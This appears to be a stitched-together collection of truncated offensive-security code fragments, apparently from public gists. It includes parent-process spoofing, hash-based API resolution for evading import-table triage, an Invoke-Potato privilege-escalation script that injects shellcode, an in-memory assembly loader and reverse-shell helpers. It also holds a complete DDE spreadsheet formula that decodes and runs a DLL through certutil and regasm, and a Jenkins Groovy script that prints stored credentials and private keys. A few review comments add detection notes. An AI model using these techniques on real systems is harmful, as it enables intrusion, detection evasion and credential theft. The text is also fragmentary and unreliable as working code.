| /* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
| /* spoof.exe explorer.exe calc.exe */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
| typedef struct _STARTUPINFOEX { | |
| STARTUPINFO StartupInfo; | |
| LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <ole2.h> // OLE2 Definitions | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| HRESULT AutoWrap(int autoType, VARIANT *pvResult, IDispatch *pDisp, LPOLESTR ptName, int cArgs...) { | |
| va_list marker; | |
| va_start(marker, cArgs); | |
| if (!pDisp) { |
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.SqlServer.Server; | |
| public partial class StoredProcedures | |
| { | |
| [StructLayout(LayoutKind.Sequential)] |
| #define WIN32_LEAN_AND_MEAN | |
| #pragma warning( disable : 4201 ) | |
| #include "GetProcAddressWithHash.h" | |
| #include <windows.h> | |
| #include <intrin.h> | |
/* Function-pointer types with the same signatures as the Win32 exports
 * LoadLibraryA, GetProcAddress and CreateProcessA. The include of
 * "GetProcAddressWithHash.h" above suggests these addresses are resolved
 * at runtime by name hash rather than through the import table -- TODO confirm
 * against the rest of the file. NOTE(review): from a detection standpoint,
 * code built this way shows none of these APIs in its import directory, so
 * static import-table triage alone will not surface them. */
typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
/* NOTE(review): LPCTSTR expands to LPCWSTR when UNICODE is defined, but the
 * ANSI CreateProcessA takes LPCSTR/LPSTR parameters; using LPCSTR here keeps
 * the pointer type independent of the UNICODE build setting. */
typedef BOOL(WINAPI * CREATEPROCESSA)(LPCTSTR, LPCTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
| function Invoke-Potato | |
| { | |
| <# | |
| .SYNOPSIS | |
| Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load Rotten Potato DLL directly into memory. This | |
| allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders. | |
| The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe |
| # was a little bored, wrote up a quick Execute Assembly script lol | |
| # download watson from memory or something with DownloadString, save to a variable and invoke from with -PEBytes. | |
| function Execute-Assembly { | |
| param( | |
| [parameter(Mandatory=$true)][byte[]]$PEBytes, | |
| [parameter(Mandatory=$false)][string]$Arguments | |
| ) | |
| $meth = [System.Reflection.Assembly]::Load($bytes); |
| # Powerfun - Written by Ben Turner & Dave Hardy | |
| # Forked for a few quick fixes. | |
function Get-Webclient
{
    <#
    .SYNOPSIS
    Builds a System.Net.WebClient that authenticates with the current user's default credentials.

    .DESCRIPTION
    UseDefaultCredentials is switched on, and the resulting credential object is
    copied onto the client's proxy so that proxy authentication also uses the
    caller's identity. The configured client is returned to the caller.

    .OUTPUTS
    System.Net.WebClient
    #>
    $client = New-Object -TypeName Net.WebClient
    $client.UseDefaultCredentials = $true
    # Mirror the client credentials onto the proxy so both hops authenticate the same way.
    $client.Proxy.Credentials = $client.Credentials
    return $client
}
| =cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
| <?xml version='1.0'?> | |
| <package> | |
| <component id='giffile'> | |
| <registration | |
| description='Dummy' | |
| progid='giffile' | |
| version='1.00' | |
| remotable='True'> | |
| </registration> | |
| <script language='JScript'> |
import com.cloudbees.plugins.credentials.*
// Enumerates the credentials held by the Jenkins SystemCredentialsProvider and
// prints them, then prints the private key of the entry at index 2.
// NOTE(review): this is presumably run from the Jenkins Script Console, which
// requires Overall/Administer -- anyone who can run it can read every stored
// secret, so Script Console access should be restricted and its use audited.
// list credentials
credentials = SystemCredentialsProvider.getInstance().getCredentials()
println credentials
// get credential value
println ''
// Hard-coded index: throws if fewer than three entries exist, and getPrivateKey()
// only exists on key-based credential types, so a different type at index 2 fails.
println credentials[2].getPrivateKey()